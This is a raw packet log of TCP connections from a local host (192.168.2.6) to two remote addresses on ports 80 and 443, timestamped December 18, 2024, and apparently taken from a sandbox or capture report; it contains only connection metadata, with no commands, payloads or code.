                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.429028034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.429816008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.429867983 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.429891109 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.430649996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.430699110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.430784941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.431608915 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.431658030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.431767941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.432478905 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.432544947 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.432563066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.433356047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.433410883 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.433450937 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.434242964 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.434290886 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.434360027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.435127020 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.435168982 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.435225010 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436022043 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436136961 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436160088 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436892986 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436940908 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.437009096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.437797070 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.437846899 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.437961102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.438730001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.438781977 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.438832045 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.439587116 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.439647913 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.439743042 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.440473080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.440511942 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.440623999 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.441430092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.441484928 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.441526890 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.442290068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.442348957 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.442476034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.443180084 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.443234921 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.443274975 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.444072008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.444116116 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.444202900 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.444961071 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.445008039 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.445096970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.445851088 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.445915937 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.446038961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.446728945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.446783066 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.446870089 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.447642088 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.447737932 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.447751045 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.448609114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.448659897 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.448719978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.449713945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.449758053 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.450154066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.451529026 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.451586008 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.451610088 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.452075958 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.452131987 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.452183962 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.452639103 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.452766895 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.452799082 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.453203917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.453269958 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.453325987 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.453922987 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.453969955 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.454132080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.454904079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.454956055 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.455089092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.455768108 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.455862999 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.455924988 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.590567112 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.590601921 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.590630054 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.590897083 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.590955019 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.591130972 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.591833115 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.591913939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.591967106 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.592781067 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.592835903 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.592894077 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.593673944 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.593765974 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.594038963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.594710112 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.594760895 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.594839096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.595526934 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.595609903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.595663071 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.596229076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.596296072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.596374989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.597122908 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.597224951 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.597239017 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.598014116 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.598146915 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.598225117 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.610522032 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.610644102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.610706091 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.611047983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.611103058 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.611285925 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.612030029 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.612075090 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.612127066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.613121986 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.613193035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.613223076 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.613441944 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.613492012 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.613954067 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.614115000 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.614183903 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.614799023 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.614954948 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.615012884 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.615880966 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.616306067 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.616368055 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.616692066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.616852045 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.616940975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.617479086 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.617628098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.617750883 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.618375063 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.618495941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.618931055 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.619285107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.619432926 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.619477034 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.620201111 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.620342016 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.620400906 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.621102095 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.621234894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.621284962 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.622009993 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.622108936 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.622153044 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.622867107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.623003960 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.623065948 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.623754978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.623873949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.624161959 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.624680996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.624809980 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.624869108 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.625529051 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.625622988 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.625678062 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.626480103 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.626523972 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.626571894 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.627278090 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.627466917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.627525091 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.628251076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.628388882 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.628545046 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.629081011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.629229069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.629295111 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.629985094 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.630145073 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.630814075 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.630888939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631059885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631117105 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631769896 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631915092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631966114 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.632682085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.632814884 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.632877111 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.633605003 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.633766890 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.633812904 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.634455919 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.634588957 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.634661913 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.635356903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.635503054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.635565996 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.636279106 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.636415958 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.636514902 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.637156010 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.637280941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.637339115 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.638082027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.638225079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.638287067 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.638993025 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.639170885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.639224052 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.639843941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.639993906 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.640048027 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.640731096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.640830994 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.640877962 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.641865969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.641936064 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.641999960 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.642668962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.642744064 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.642806053 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.643559933 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.643683910 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.643980980 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.644373894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.644443989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.644606113 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.645251989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.645363092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.645481110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.646195889 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.646275043 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.646389961 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.646981001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.647171021 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.647233963 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.647883892 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.648005009 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.648070097 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739866018 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739888906 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739923954 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739954948 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739973068 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739993095 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765018940 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765031099 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765091896 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765110970 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765152931 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.781793118 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.781864882 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782414913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782535076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782601118 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782749891 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782892942 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783101082 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783147097 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783850908 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783895969 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783919096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.784683943 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.784792900 CET4980280192.168.2.6139.99.188.124
